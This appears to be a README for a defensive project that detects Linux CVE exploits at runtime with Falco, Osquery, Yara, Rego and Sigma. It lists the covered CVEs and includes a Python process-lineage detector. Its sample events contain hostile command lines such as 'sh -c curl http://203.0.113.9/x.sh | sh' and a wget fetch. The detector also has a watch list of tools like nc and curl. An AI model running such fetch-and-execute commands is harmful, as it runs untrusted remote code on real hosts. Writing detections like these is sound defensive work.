Linux vulnerability (CVE) exploit detection through runtime security using Falco/Osquery/Yara/Rego/Sigma
This is an experimental project to evaluate possible ways to detect exploits (CVE) in a Linux environment (host/container/cloud) using:
- eBPF based - Falco Runtime Security
- Analytic + memory based - Osquery + Yara
- Policy based - Rego + OPA / Aquasec Tracee
- Log based - Sigma
We were able to detect the majority of the exploits through eBPF or kprobe instrumentation by analyzing the syscalls. Both the Falco and Rego approaches produced accurate detections in host and containerized environments. However, there are a few limitations in all of the above approaches; stay tuned, a blog post on them is coming out soon.

The repository currently covers the following CVEs:
- CVE-2022-36804 - Atlassian-Bitbucket
- CVE-2022-26134 - Atlassian-Confluence
- CVE-2021-26084 - Atlassian-Confluence
- CVE-2021-26085 - Atlassian-Confluence
- CVE-2022-26138 - Atlassian-Confluence
- CVE-2023-22515 - Atlassian-Confluence
- CVE-2022-24112 - Apache-APISIX
- CVE-2023-0669 - GoAnywhere-MFT
- CVE-2023-27350 - PaperCut
- CVE-2023-27351 - PaperCut
- CVE-2023-33246 - RocketMQ
- CVE-2022-29464 - WSO2
- CVE-2023-32007 - Apache-Spark
- CVE-2022-46169 - Cacti
- CVE-2022-24706 - CouchDB
- CVE-2021-22205 - GitLab
- CVE-2022-44268 - ImageMagick
- CVE-2023-28432 - MinIO
- CVE-2023-32315 - Openfire
- CVE-2020-14883 - Oracle-WebLogic
- CVE-2021-2109 - Oracle-WebLogic
- CVE-2023-21839 - Oracle-WebLogic
- CVE-2022-0543 - Redis
- CVE-2022-35914 - Teclib-GLPI
- CVE-2022-26352 - dotCMS
- CVE-2023-38646 - Metabase
- CVE-2023-25826 - OpenTSDB
- CVE-2020-35476 - OpenTSDB
- CVE-2023-38633 - librsvg
More to come...
All of these detections were tested in host and containerized environments, where we reproduced each exploit and captured the required events. The rules in this repository can introduce performance overhead, so we suggest testing them before using them in a production environment.
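As an added illustration of the syscall-based approach described above (this is example code written for this page, not one of the repository's Falco or Rego rules), the sketch below applies two process-lineage checks to execve events: a server process directly spawning a shell, and a download tool appearing anywhere under a server process. The events, process-name sets, allowlist entry and field names are constructed assumptions for the example; Falco expresses the same checks with `proc.name`, `proc.pname` and `proc.aname[n]` in its rule conditions.

```python
"""Process-lineage exploit detection over execve events (illustrative)."""
import json

# Hypothetical process classes for this example; the repository's Falco/Rego
# rules keep their own per-CVE lists.
SERVER_PROCS = {"java", "redis-server", "php-fpm", "node", "ruby"}
SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = {"curl", "wget", "nc", "ncat"}

# Shell command lines a server is allowed to run (assumed); without such an
# allowlist, health checks and startup hooks fire the rule on every deploy.
ALLOWED_SHELL_CMDS = ("sh -c /opt/app/bin/healthcheck.sh",)

MAX_DEPTH = 4  # how many ancestors to walk when looking for a server process

# Constructed execve events, one JSON object per line, using Falco-style
# field names (proc.pid, proc.ppid, proc.name, ...).  A real feed would be
# Falco with -o json_output=true or a raw eBPF/kprobe execve tracepoint.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"evt.type": "execve", "proc.pid": 10, "proc.ppid": 1, "proc.name": "sshd",
     "proc.cmdline": "sshd: admin", "container.id": "host"},
    {"evt.type": "execve", "proc.pid": 20, "proc.ppid": 10, "proc.name": "bash",
     "proc.cmdline": "bash", "container.id": "host"},  # admin shell, benign
    {"evt.type": "execve", "proc.pid": 100, "proc.ppid": 1, "proc.name": "java",
     "proc.cmdline": "java -jar confluence.jar", "container.id": "c1"},
    {"evt.type": "execve", "proc.pid": 101, "proc.ppid": 100, "proc.name": "sh",
     "proc.cmdline": "sh -c /opt/app/bin/healthcheck.sh", "container.id": "c1"},  # allowlisted
    {"evt.type": "execve", "proc.pid": 102, "proc.ppid": 100, "proc.name": "sh",
     "proc.cmdline": "sh -c curl http://203.0.113.9/x.sh | sh", "container.id": "c1"},
    {"evt.type": "execve", "proc.pid": 103, "proc.ppid": 102, "proc.name": "curl",
     "proc.cmdline": "curl http://203.0.113.9/x.sh", "container.id": "c1"},
    {"evt.type": "execve", "proc.pid": 300, "proc.ppid": 1, "proc.name": "redis-server",
     "proc.cmdline": "redis-server /etc/redis.conf", "container.id": "c2"},
    {"evt.type": "execve", "proc.pid": 301, "proc.ppid": 300, "proc.name": "sh",
     "proc.cmdline": "sh -c id", "container.id": "c2"},
    {"evt.type": "execve", "proc.pid": 302, "proc.ppid": 999, "proc.name": "wget",
     "proc.cmdline": "wget http://203.0.113.9/b", "container.id": "c2"},  # parent never seen
])


def ancestors(table, pid, max_depth=MAX_DEPTH):
    """Yield (depth, name) up the parent chain of pid.

    Stops at unknown pids, e.g. processes that started before the probe was
    loaded, so a missing parent degrades to 'no match' instead of an error.
    """
    ppid = table.get(pid, {}).get("ppid")
    depth = 1
    while ppid in table and depth <= max_depth:
        yield depth, table[ppid]["name"]
        ppid = table[ppid]["ppid"]
        depth += 1


def detect(event_lines):
    """Run the two lineage rules over newline-delimited JSON execve events."""
    table = {}  # pid -> {"name", "ppid"}: the minimal process tree the rules need
    alerts = []
    for line in event_lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("evt.type") != "execve":
            continue
        pid, name, cmd = ev["proc.pid"], ev["proc.name"], ev.get("proc.cmdline", "")
        table[pid] = {"name": name, "ppid": ev["proc.ppid"]}
        lineage = list(ancestors(table, pid))
        parent = lineage[0][1] if lineage else None
        base = {"pid": pid, "container": ev.get("container.id"), "cmdline": cmd}

        # Rule 1: a server process directly spawns a shell.  Falco-equivalent
        # condition: spawned_process and proc.name in (SHELLS) and proc.pname in (SERVER_PROCS)
        if name in SHELLS and parent in SERVER_PROCS and not cmd.startswith(ALLOWED_SHELL_CMDS):
            alerts.append({"rule": "server_spawned_shell", **base})

        # Rule 2: a download/network tool anywhere under a server process,
        # catching java -> sh -> curl where the direct parent is only the shell.
        if name in DOWNLOADERS and any(n in SERVER_PROCS for _, n in lineage):
            alerts.append({"rule": "server_lineage_download", **base})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Run against the constructed feed, this flags the Confluence-style `java -> sh -c curl ... | sh` chain twice (once for the shell, once for the download under it) and the Redis `sh -c id` spawn, while the admin's `sshd -> bash`, the allowlisted health check and the `wget` with an unseen parent stay quiet. The ancestry walk is where the overhead noted above comes from: every execve triggers a lookup several levels deep, which is why bounding `MAX_DEPTH` (or, in Falco, keeping `proc.aname[n]` conditions short) matters on busy hosts.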